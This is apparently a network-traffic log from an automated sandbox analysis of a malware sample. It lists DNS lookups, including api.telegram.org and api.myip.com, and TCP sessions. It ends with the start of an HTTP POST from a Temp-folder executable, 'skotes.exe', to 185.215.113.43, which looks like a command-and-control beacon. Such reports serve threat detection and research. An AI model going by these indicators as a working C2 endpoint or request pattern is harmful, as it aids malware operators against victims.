                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:50.838402033 CET60928443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:50.838490009 CET60928443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:50.954462051 CET44360928162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:50.955077887 CET60928443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:50.993451118 CET60928443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.161113977 CET44360928162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.161132097 CET44360928162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.161159039 CET44360928162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.161168098 CET44360928162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.161173105 CET44360928162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.161258936 CET44360928162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.161550045 CET60928443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.161621094 CET60928443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.161705017 CET60928443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.165376902 CET60928443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.278234005 CET44360928162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.306353092 CET60928443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.490156889 CET44360928162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.493736029 CET44360928162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.524606943 CET60928443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:52.567529917 CET54827443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:52.567750931 CET54827443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:52.568074942 CET54827443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:52.568192959 CET54827443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:53.586847067 CET54827443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:53.586847067 CET54827443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:53.587142944 CET54827443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:53.587213039 CET54827443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:53.709692001 CET44354827162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:53.714765072 CET54827443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:53.746764898 CET54827443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:53.922424078 CET44354827162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:53.922447920 CET44354827162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:53.922461033 CET44354827162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:53.922512054 CET44354827162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:53.923073053 CET54827443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:53.923073053 CET54827443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:53.923073053 CET54827443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:54.047513962 CET44354827162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:54.087521076 CET54827443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:54.256057978 CET44354827162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:17:54.289591074 CET54827443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:46.040618896 CET5809153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:46.177486897 CET53580911.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:49.854204893 CET5992153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:49.854382992 CET5545153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:49.991110086 CET53554511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:49.991256952 CET53599211.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:49.992779016 CET59542443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:49.992964029 CET59542443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:49.993391991 CET59542443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:49.993594885 CET59542443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:50.868587971 CET5199953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:50.868593931 CET59542443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:50.868593931 CET59542443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:50.868927956 CET59542443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:50.868928909 CET5901653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:50.868990898 CET59542443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.124372005 CET44359542162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.128062963 CET59542443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.167346954 CET59542443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.193109035 CET44359542162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.193233013 CET44359542162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.193275928 CET44359542162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.193317890 CET44359542162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.193557024 CET59542443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.193578005 CET59542443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.193578005 CET59542443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.456998110 CET44359542162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.495677948 CET59542443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.516977072 CET44359542162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.517011881 CET44359542162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.555706024 CET59542443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:06.058908939 CET192.168.2.51.1.1.1c29b(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:53.992043972 CET192.168.2.51.1.1.1c29c(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:09.553951025 CET192.168.2.51.1.1.10x1228Standard query (0)thedotmediagroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:41.062479019 CET192.168.2.51.1.1.10x8712Standard query (0)api.myip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:55.747128963 CET192.168.2.51.1.1.10x58dbStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:55.747296095 CET192.168.2.51.1.1.10x2009Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.389655113 CET192.168.2.51.1.1.10x2bb2Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.389847040 CET192.168.2.51.1.1.10x37c2Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.532634020 CET192.168.2.51.1.1.10x3545Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.532836914 CET192.168.2.51.1.1.10xece5Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.533422947 CET192.168.2.51.1.1.10x3dbbStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.533668041 CET192.168.2.51.1.1.10xe322Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.555814028 CET192.168.2.51.1.1.10x4258Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.556057930 CET192.168.2.51.1.1.10x5eb3Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.636600971 CET192.168.2.51.1.1.10x4685Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.636924982 CET192.168.2.51.1.1.10x9901Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:47.544872999 CET192.168.2.51.1.1.10x3beStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:47.545123100 CET192.168.2.51.1.1.10x6c38Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:49.812057972 CET192.168.2.51.1.1.10x6a47Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:49.812057972 CET192.168.2.51.1.1.10x2ae1Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.152337074 CET192.168.2.51.1.1.10xc1fbStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.152535915 CET192.168.2.51.1.1.10xfb2fStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.159936905 CET192.168.2.51.1.1.10xd067Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.160165071 CET192.168.2.51.1.1.10x8043Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.301636934 CET192.168.2.51.1.1.10x8ddcStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.301794052 CET192.168.2.51.1.1.10xeefStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.379450083 CET192.168.2.51.1.1.10xedeaStandard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.379761934 CET192.168.2.51.1.1.10x52c9Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.475274086 CET192.168.2.51.1.1.10x81efStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.475532055 CET192.168.2.51.1.1.10x9905Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:51.384736061 CET192.168.2.51.1.1.10xec65Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.529969931 CET192.168.2.51.1.1.10x56dfStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.530227900 CET192.168.2.51.1.1.10xa1deStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.530817032 CET192.168.2.51.1.1.10xece7Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.530930042 CET192.168.2.51.1.1.10x32cbStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:08.947881937 CET192.168.2.51.1.1.10x2f5eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.369199991 CET192.168.2.51.1.1.10x16b0Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.369461060 CET192.168.2.51.1.1.10x90d4Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:50.838041067 CET192.168.2.51.1.1.10xb20Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:50.838315010 CET192.168.2.51.1.1.10xc593Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:46.040618896 CET192.168.2.51.1.1.10x6865Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:49.854204893 CET192.168.2.51.1.1.10xeef6Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:49.854382992 CET192.168.2.51.1.1.10xe671Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:50.868587971 CET192.168.2.51.1.1.10xc973Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:50.868928909 CET192.168.2.51.1.1.10x63cdStandard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:11:15.754086971 CET1.1.1.1192.168.2.50xae62No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:11:15.754086971 CET1.1.1.1192.168.2.50xae62No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:10.092015028 CET1.1.1.1192.168.2.50x1228No error (0)thedotmediagroup.com188.165.52.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:41.202162027 CET1.1.1.1192.168.2.50x8712No error (0)api.myip.com172.67.75.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:41.202162027 CET1.1.1.1192.168.2.50x8712No error (0)api.myip.com104.26.8.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:41.202162027 CET1.1.1.1192.168.2.50x8712No error (0)api.myip.com104.26.9.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:55.884210110 CET1.1.1.1192.168.2.50x58dbNo error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:55.884414911 CET1.1.1.1192.168.2.50x2009No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.531302929 CET1.1.1.1192.168.2.50x2bb2No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.531960964 CET1.1.1.1192.168.2.50x37c2No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.677383900 CET1.1.1.1192.168.2.50xece5No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.678039074 CET1.1.1.1192.168.2.50x3545No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.678039074 CET1.1.1.1192.168.2.50x3545No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.678234100 CET1.1.1.1192.168.2.50x3dbbNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.678234100 CET1.1.1.1192.168.2.50x3dbbNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.678967953 CET1.1.1.1192.168.2.50xe322No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.708657980 CET1.1.1.1192.168.2.50x4258No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.708657980 CET1.1.1.1192.168.2.50x4258No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.708810091 CET1.1.1.1192.168.2.50x5eb3No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.789491892 CET1.1.1.1192.168.2.50x9cc9No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.789491892 CET1.1.1.1192.168.2.50x9cc9No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:04.812963009 CET1.1.1.1192.168.2.50x1e7No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.773741007 CET1.1.1.1192.168.2.50x9901No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:07.774427891 CET1.1.1.1192.168.2.50x4685No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:47.681708097 CET1.1.1.1192.168.2.50x3beNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:47.682447910 CET1.1.1.1192.168.2.50x6c38No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:49.949799061 CET1.1.1.1192.168.2.50x6a47No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:49.950005054 CET1.1.1.1192.168.2.50x2ae1No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.297306061 CET1.1.1.1192.168.2.50x8043No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.298057079 CET1.1.1.1192.168.2.50xd067No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.471117020 CET1.1.1.1192.168.2.50xc1fbNo error (0)sb.scorecardresearch.com3.160.188.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.471117020 CET1.1.1.1192.168.2.50xc1fbNo error (0)sb.scorecardresearch.com3.160.188.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.471117020 CET1.1.1.1192.168.2.50xc1fbNo error (0)sb.scorecardresearch.com3.160.188.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.471117020 CET1.1.1.1192.168.2.50xc1fbNo error (0)sb.scorecardresearch.com3.160.188.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.517157078 CET1.1.1.1192.168.2.50xedeaNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.517303944 CET1.1.1.1192.168.2.50x52c9No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.538228035 CET1.1.1.1192.168.2.50xeefNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.607620001 CET1.1.1.1192.168.2.50x8ddcNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.607620001 CET1.1.1.1192.168.2.50x8ddcNo error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.612869024 CET1.1.1.1192.168.2.50x81efNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:50.612916946 CET1.1.1.1192.168.2.50x9905No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:51.521653891 CET1.1.1.1192.168.2.50xec65No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.670985937 CET1.1.1.1192.168.2.50x56dfNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.670985937 CET1.1.1.1192.168.2.50x56dfNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.671003103 CET1.1.1.1192.168.2.50xece7No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.671003103 CET1.1.1.1192.168.2.50xece7No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.671098948 CET1.1.1.1192.168.2.50x32cbNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:52.672946930 CET1.1.1.1192.168.2.50xa1deNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:09.084690094 CET1.1.1.1192.168.2.50x2f5eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.506975889 CET1.1.1.1192.168.2.50x16b0No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:02.507102013 CET1.1.1.1192.168.2.50x90d4No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:50.977380991 CET1.1.1.1192.168.2.50xc593No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:16:51.074420929 CET1.1.1.1192.168.2.50xb20No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:18:46.177486897 CET1.1.1.1192.168.2.50x6865No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:49.991110086 CET1.1.1.1192.168.2.50xe671No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:49.991256952 CET1.1.1.1192.168.2.50xeef6No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:49.991256952 CET1.1.1.1192.168.2.50xeef6No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.008224964 CET1.1.1.1192.168.2.50xc973No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:19:51.008286953 CET1.1.1.1192.168.2.50x63cdNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                    • thedotmediagroup.com
                                                                                                                                                                                                                                                                                    • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    • api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                    • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                    • https:
                                                                                                                                                                                                                                                                                      • assets.msn.com
                                                                                                                                                                                                                                                                                      • c.msn.com
                                                                                                                                                                                                                                                                                    • msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                    • data-edge.smartscreen.microsoft.com
                                                                                                                                                                                                                                                                                    • api.telegram.org
                                                                                                                                                                                                                                                                                    • 185.215.113.43
                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    0192.168.2.549812185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:12:04.997021914 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
